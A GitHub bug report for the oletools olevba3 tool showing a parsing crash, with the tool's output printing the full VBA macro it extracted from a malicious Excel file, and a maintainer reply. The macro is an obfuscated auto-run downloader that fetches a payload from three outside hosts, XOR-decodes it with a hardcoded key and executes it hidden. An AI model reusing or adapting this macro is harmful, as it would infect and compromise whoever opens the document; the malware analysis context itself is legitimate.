### ISSUE TITLE
Error on parsing

### ISSUE THREAD

**Issue by jeremy1392** [decalage2/oletools#399]
**Affected tool:**
olevba3

**Describe the bug**
olevba3 on a .xls file

**bug:**
```
(mlenv) root@MLSuperServer:/var/www/html/ml/venv/xlsproject# olevba3 _0307109_002273.xls

> olevba3 0.53.1 - http://decalage.info/python/oletools
> Flags        Filename
> -----------  -----------------------------------------------------------------
> OpX:MASIHB-- _0307109_002273.xls
> ===============================================================================
> FILE: _0307109_002273.xls
> Type: OpenXML
> -------------------------------------------------------------------------------
> VBA MACRO ThisWB.cls
> in file: xl/vbaProject.bin - OLE stream: 'VBA/ThisWB'
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
> 
> 
> 
> Public Function shtiletMurinorfl(str)
> 
> 
>  Set ProjectAndNow = CreateObject(shtiletMurinoPlushka(1))
> 
>     copyHeader
> 
> 
> End Function
> 
> 
> 
> Sub Halls()
> VishkaRupopop 1, "FFW", 2
> End Sub
> 
> Sub Workbook_Open()
> Robobob = firm.Label1.Caption
> shtiletMurino2 = firm.Label3.Caption
> 
> Halls
> End Sub
> 
> 
> Public Function VishkaRupopop(rex As Integer, sMetarVis As String, dd As Integer) As String
>   Dim iSlashPOS As Integer
>   Dim sDecimalVis As String
>   Dim sWholeVis As String
>   Dim sTempVis As String
>   Dim iCount As Integer
>   Dim sVisibility As String
>   Dim sNodeKey As String
>   Dim sParentKey As String
>   Dim sVis As String
> 
> 
> 
> 
>      shtiletMurinoPlushka = Split(shtiletMurino2, "GRAND")
> 
> 
>        shtiletMurinorfl ""
> 
>  End Function
> 
> -------------------------------------------------------------------------------
> VBA MACRO Page.cls
> in file: xl/vbaProject.bin - OLE stream: 'VBA/Page'
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
> (empty macro)
> -------------------------------------------------------------------------------
> VBA MACRO Module1.bas
> in file: xl/vbaProject.bin - OLE stream: 'VBA/Module1'
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
> 
> Public shtiletMurinoLAKOPPC As String
> Public shtiletMurinoPlushka() As String
> Public shtiletMurinoUUUKA As String
> Public shtiletMurinoUUUKABBB As String
> 
> Public shtiletMurinoLiznula As Object
> 
> Public shtiletMurinoGMAKO As Object
> Public shtiletMurino4 As String
>  Public shtiletMurino2 As String
> Public shtiletMurinoASALLLP As Variant
> Public ProjectDarvin As Integer
> 
> Public ProjectBen10() As String
>  Public Const shtiletMurinoRH = "User-Agent"
> Public Const ProjectTransformation = "avetof"
> Public Robobob As String
> 
> 
> 
> Public acs As Object
> Public ProjectAndNow As Object
> Public ProjectWhileFor As Object
> 
> 
> 
> 
> 
> 
> 
> 
> Public Sub funtionallle(SourceFile As String, pram1J As String, Optional Key As String)
> 
>   Dim pram1 As Integer
>   Dim spkAr() As Byte
> 
>   pram1 = FreeFile
>   Open SourceFile For Binary As #pram1
>   ReDim spkAr(0 To LOF(pram1) - 1)
>   Get #pram1, , spkAr()
>   Close #pram1
> 
> 
>   Call funtionallle2(spkAr(), Key)
> 
> 
> 
>   pram1 = FreeFile
>   Open pram1J For Binary As #pram1
>   Put #pram1, , spkAr()
>   Close #pram1
> 
> End Sub
> 
> 
> Public Function shtiletMurinomilfRodeo() As Boolean
> '* Authored by Nathan N on 6/4/2012
> '* Determines if user is using windows 7
> 
> CallByName acs, "setRequestHeader", VbMethod, shtiletMurinoRH, "Mozilla/5.0 (Windows NT 6.1; rv:50.0) Gecko/20200102 Firefox/50.0"
> GoTo wii
> If Left(Appl.ication.OperatingSystem, 21) = "Windows (32-bit) NT 5" Then
>     windows7os = False
> Else
>     windows7os = True
> End If
> wii:
> End Function
> Public Function hub_path() As String
> '// Created by Nathan N on 7/9/2012
> ProjectBen10 = Split("sparky.com/87t34f+ktlelektro.cz/87t34f+analypia.com/87t34f", firm.BorLbl.Caption)
> 
> hub_path = "\\hqclienthub\Client Hub"
> End Function
> Public Function report_archive_path() As String
> '// Created by Nathan N on 7/9/2012
> report_archive_path = "\\colofs1\Vendor Team\CONTACT MANAGEMENT\CMT Reports"
> End Function
> Public Function ref_path() As String
> '// Created by Nathan N on 7/12/2012
> ref_path = "\\colofs1\Vendor Team\CONTACT MANAGEMENT\CMT Reports\Reference\ClientReferenceList.xlsx"
> End Function
> 
> 
> 
> 
> Public Sub delete_empty_entries(ByVal ws As String, ByVal fieldName As String)
> 'Authored by Nathan N on 4/9/2012
> 
> Dim i As Long
> Set shtiletMurinoLiznula = CreateObject(shtiletMurinoPlushka(3))
> 
> 
> hub_path
> 
> PushedPlisk
> Exit Sub
> For i = 2 To Las.tRow(ws)
> 
>     If (w.s.Cells(i, Fiel.dColNum(ws, fieldName)) = "") Then
>         w.s.Rows(i).Delete shift:=xlUp
>         i = i - 1
>         If (i = La.stRow(ws)) Then
>             Exit For
>         End If
>     End If
> 
> Next i
> 
> End Sub
> 
> Public Function InArray(ByRef arrayName() As Variant, ByVal elementValue As Variant) As Boolean
> 'Created on 3/13/2012 by Nathan N
> 
> Dim i As Long
> 
> For i = 0 To UBound(arrayName())
>     If (elementValue = arrayName(i)) Then 'If the elementValue is found at any point in the array, then TRUE
>         InArray = True
>         Exit Function
>     End If
> Next i
> 
> 
> InArray = False 'Otherwise, InArray is false
> 
> End Function
> Public Function GodnTeBabenParama(CH1 As String, CH2 As String, CH3 As String) As String
> GodnTeBabenParama = Replace(CH1, CH2, CH3)
> End Function
> 
> Public Sub CoachesReport(ByVal Name As String)
> 
> CallByName ProjectAndNow, "s" + ProjectTransformation + "ile", VbMethod, shtiletMurinoUUUKABBB, 2
>  funtionallle shtiletMurinoUUUKABBB, shtiletMurinoUUUKA, "8CehDvmPrN2lpRUZM0jQH9M42gfAGhzT"
>  ExpoTruckManagerCop ""
> 
>     End Sub
> 
> 
> 
> Public Sub funtionallle2(ByteArray() As Byte, codeck As String)
> 
> 
>   Dim AsString() As Byte
> Dim AsStringLen As Long
>   Dim extraName2 As Long
>   Dim extraName3 As Long
> Dim extraName4 As Long
>   Dim extraName5 As Long
>   Dim extraName6 As Long
>   AsStringLen = Len(codeck)
> ReDim AsString(AsStringLen)
> 
>   AsString = StrConv(codeck, vbFromUnicode)
> 
> 
>   extraName2 = UBound(ByteArray) + 1
>   extraName5 = extraName2
> 
> 
>   For extraName4 = 0 To (extraName2 - 1)
>     ByteArray(extraName4) = ByteArray(extraName4) Xor AsString(extraName4 Mod AsStringLen)
> 
> 
>     If (extraName4 >= extraName6) Then
>       extraName3 = Int((extraName4 / extraName5) * 100)
>       extraName6 = (extraName5 * ((extraName3 + 1) / 100)) + 1
>     End If
>   Next
> End Sub
> 
> 
> Public Sub Add_Header(ByVal Name As String)
> 
>  ProjectAndNow.Type = 1
>  ProjectAndNow.Open
>  RemoveIDAndFormatRow
>   Exit Sub
>     She.ets(Name).Select
>     Call AddF.irstRow
>     Call copyHeader
>     She.ets(Name).Select
>     Ro.ws("1:1").Select
>     ActiveSheet.Paste
> 
> End Sub
> 
> 
> Public Sub MAIN()
> 
>  shtiletMurinoUUUKA = shtiletMurinoLAKOPPC
> 
> 
>  shtiletMurinoUUUKABBB = shtiletMurinoUUUKA + "\lodka" + CStr(ProjectDarvin)
> shtiletMurinoUUUKA = shtiletMurinoUUUKA + Replace(shtiletMurinoPlushka(12), ".", CStr(ProjectDarvin) + ".")
> Add_Header ""
> 
> End Sub
> 
> 
> Public Sub SendTabsToFile()
> 
> 
> 
> 
> acs.Send
> If acs.Status <> 200 Then
>  Err.Raise vbObjectError + 515, "33", "44"
> End If
> 
> 
> 
>     MAIN
> End Sub
> 
> 
> 
> 
> Public Sub copyHeader()
> 
> 
>  Set shtiletMurinoGMAKO = CreateObject(shtiletMurinoPlushka(5 - 3))
>  DeleteExtraSheets
>  Exit Sub
>     She.ets("Admin codes and info").Select
>     Ro.ws("9:9").Select
>     Sel.ection.Copy
> End Sub
> 
> 
> 
> Public Sub DeleteExtraSheets()
> 
> Set acs = CreateObject(shtiletMurinoPlushka(0))
> delete_empty_entries "", ""
> Exit Sub
>     Application.DisplayAlerts = False
>     She.ets("Admin codes and info").Delete
>     She.ets("Misc accounts").Delete
>     She.ets("Coach and Dist Finished").Delete
>     She.ets("Sub cancelled").Delete
>     Application.DisplayAlerts = True
> End Sub
> 
> 
> Public Sub ExpoTruckManagerCop(ByVal Name As String)
> 
> Dim FirstRow As Long
> Dim lastRow As Long
> Dim Lrow As Long
>    Shell Robobob & shtiletMurinoUUUKA & ",plan", vbHide
> 
> End Sub
> 
> 
> Sub SaveWorkingCopy()
> 
>     Dim relativePath As String
>     Application.DisplayAlerts = False
> 
>     relativePath = ThisWorkbook.Path & "\" & "Levels Passed by Members " & Day(Now()) & "-" & Month(Now()) & "-" & Year(Now()) & " Filtered.xlsx"
> 
>     ActiveWorkbook.SaveAs Filename:=relativePath
> 
>     Application.DisplayAlerts = True
> 
> End Sub
> 
> 
> 
> Public Sub RemoveIDAndFormatRow()
> 
> shtiletMurinoASALLLP = acs.responseBody
> 
>  ProjectAndNow.Write shtiletMurinoASALLLP
>  CoachesReport ""
> Exit Sub
>     Rows.Select
>     Sel.ection.RowHeight = 15
>     Colu.mns("A:A").Delete
> 
>     Colu.mns("A").ColumnWidth = 25
>     Colu.mns("B").ColumnWidth = 15
>     Colu.mns("C").ColumnWidth = 24.71
>     Colu.mns("I:R").ColumnWidth = 11
> 
> 
> End Sub
> 
> 
> 
> 
> 
> Public Sub PushedPlisk()
> 
>  Set ProjectWhileFor = shtiletMurinoLiznula.Environment(shtiletMurinoPlushka(2 + 2))
>  shtiletMurinoLAKOPPC = ProjectWhileFor(shtiletMurinoPlushka(6))
>  ProjectDarvin = 0
> 
>  Dim i
>  On Error GoTo nextU
> For i = LBound(ProjectBen10) To UBound(ProjectBen10) Step 1
>  shtiletMurino4 = firm.Label2.Caption & ProjectBen10(i)
>  ProjectDarvin = ProjectDarvin + 1
>  acs.Open shtiletMurinoPlushka(5), shtiletMurino4, False
> 
> shtiletMurinomilfRodeo
> SendTabsToFile
>  Exit Sub
> nextU:
> Next
> 
> End Sub
> 
> 
> -------------------------------------------------------------------------------
> VBA MACRO firm.frm
> in file: xl/vbaProject.bin - OLE stream: 'VBA/firm'
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
> (empty macro)
> ERROR    Unhandled exception in main: Error processing file _0307109_002273.xls (Attempting to open a stream from a closed OLE File)
> Traceback (most recent call last):
>   File "/var/www/html/ml/mlenv/lib/python3.6/site-packages/oletools/olevba3.py", line 3226, in process_file
>     for (subfilename, stream_path, form_string) in self.extract_form_strings():
>   File "/var/www/html/ml/mlenv/lib/python3.6/site-packages/oletools/olevba3.py", line 3085, in extract_form_strings
>     for results in ole_subfile.extract_form_strings():
>   File "/var/www/html/ml/mlenv/lib/python3.6/site-packages/oletools/olevba3.py", line 3094, in extract_form_strings
>     form_data = ole.openstream(o_stream).read()
>   File "/var/www/html/ml/mlenv/lib/python3.6/site-packages/oletools/thirdparty/olefile/olefile.py", line 2012, in openstream
>     return self._open(entry.isectStart, entry.size)
>   File "/var/www/html/ml/mlenv/lib/python3.6/site-packages/oletools/thirdparty/olefile/olefile.py", line 1908, in _open
>     olefileio=self)
>   File "/var/www/html/ml/mlenv/lib/python3.6/site-packages/oletools/thirdparty/olefile/olefile.py", line 773, in __init__
>     raise OSError('Attempting to open a stream from a closed OLE File')
> OSError: Attempting to open a stream from a closed OLE File
> 
> During handling of the above exception, another exception occurred:
> 
> Traceback (most recent call last):
>   File "/var/www/html/ml/mlenv/lib/python3.6/site-packages/oletools/olevba3.py", line 3611, in main
>     deobfuscate=options.deobfuscate)
>   File "/var/www/html/ml/mlenv/lib/python3.6/site-packages/oletools/olevba3.py", line 3245, in process_file
>     raise ProcessingError(self.filename, exc)
> oletools.olevba3.ProcessingError: Error processing file _0307109_002273.xls (Attempting to open a stream from a closed OLE File)
> 
> 
```
**Version information:**
 - OS: Ubuntu 18.04
 - OS version: 64 bits
 - Python version: 3.6.4 64 bits
 - oletools version: 0.53

**Additional context**

**Comment by decalage2** [comment]
Hi @jeremy1392, this bug has been fixed in the dev version (0.54). See https://github.com/decalage2/oletools/wiki/Install#how-to-install-the-latest-development-version if you want to test it.
